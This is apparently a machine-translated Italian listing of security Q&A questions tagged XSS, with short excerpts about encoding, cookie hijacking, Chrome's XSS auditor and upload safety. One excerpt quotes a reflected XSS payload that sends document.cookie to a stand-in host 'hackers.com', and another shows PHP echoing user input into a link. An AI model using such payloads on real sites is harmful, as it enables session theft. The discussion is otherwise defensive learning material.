Domande con tag 'xss'

domande con tag
1
risposta

URLEncode contro HTMLEncode per la prevenzione XSS

Ho un progetto (in Java) che il programmatore ha utilizzato URLEncode per l'output del contenuto come parte di HTML invece di HTMLEncode. Qual è il rischio che sia vulnerabile all'XSS? (Dimentichiamo che è una codifica diversa e otterrà risul...
posta 14.11.2011 - 09:24
5
risposte

Sta convertendo '' in '<' sufficiente per impedire l'esecuzione di JavaScript da HTML arbitrario?

Questa è una specie di domanda bar-scommessa. Un mio conoscente ha affermato che, dato un arbitrario glob di HTML, può essere completamente impedito di eseguire JavaScript se, prima di schiacciarlo in una pagina Web, si sostituiscono tutte le...
posta 26.11.2014 - 03:45
1
risposta

Esiste la possibilità di ignorare il controllore xss di Chrome in questo caso?

Sono appena scaduto con xss nel mio server. Ho scritto un codice come questo: <?php if (isset($_POST['data'])) { echo "<a href='".htmlentities($_POST['data'])."'>Click Here</a><br/>"; } ?> Ecco un pi...
posta 13.02.2017 - 20:09
1
risposta

XSS all'interno di CSS quando "è codificato?

Sto cercando di far funzionare XSS su un sito. Mi permette di modificare i CSS che sono poi inclusi nell'origine della pagina web, ma non mi consentirà di usare ", solo". La sorgente è così: body { margin: 0; padding: 0; background-color...
posta 04.09.2012 - 22:24
4
risposte

XSS per rubare i cookie ... non più?

L'altro giorno ho trovato una vulnerabilità XSS in un sito web che un amico mi ha detto di Pentest. Era una pagina di una scuola che stava gestendo, quindi la cosa importante qui sono le credenziali di accesso == COOKIES. In questo test, ho s...
posta 10.08.2015 - 05:29
4
risposte

Suggerimenti per evitare il dirottamento dei cookie in un'applicazione web

Ho sviluppato applicazioni web da un po 'di tempo. Durante la creazione di siti Web, la funzione "ricordami di me" è una delle funzionalità più banali (lette come must-have-for-clients) da implementare. Fino ad oggi, stavo solo usando le impleme...
posta 15.05.2014 - 08:53
1
risposta

Attacco XSS riflesso tramite richiesta POST e payload XML

So che un XSS riflesso può essere fatto con una richiesta GET come: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Finché la risposta è simile a questa: <html>...
posta 15.09.2013 - 22:30
2
risposte

Come garantire che i file caricati dagli utenti non contengano alcun codice XSS

Ho lavorato per fornire la sicurezza relativa agli attacchi XSS. Il mio sito web consente solo i seguenti mime-types: XML, CSV, HTML, PLAIN, VND_WAP_WML, APPLICATION_ZIP, APPLICATION_PDF, APPLICATION_VND_FDF, APPLICATION_MS_WORD, APPLICATIO...
posta 15.07.2013 - 10:32
2
risposte

Per quali tipi di contenuto è consigliato impostare l'intestazione X-XSS-Protection?

Si potrebbe probabilmente suggerire di impostare questa intestazione per tutte le risposte da un server web (sto pensando a value="1; mode = block"). Tuttavia, ha senso impostarlo quando serve, ad esempio, le immagini? File CSS? Risposte JSON...
posta 09.02.2017 - 19:22
1
risposta

Quali sono le misure di sicurezza adottate sui siti Web che consentono la creazione di script online come jsfiddle e codepen?

Come richiesto nel titolo, mi sono chiesto questo per un po '. Questi siti consentono all'utente di scrivere script e memorizzarli. Non sono vulnerabili ad attacchi come scripting cross-site o altri attacchi simili? In tal caso, come proteggono...
posta 09.11.2017 - 02:26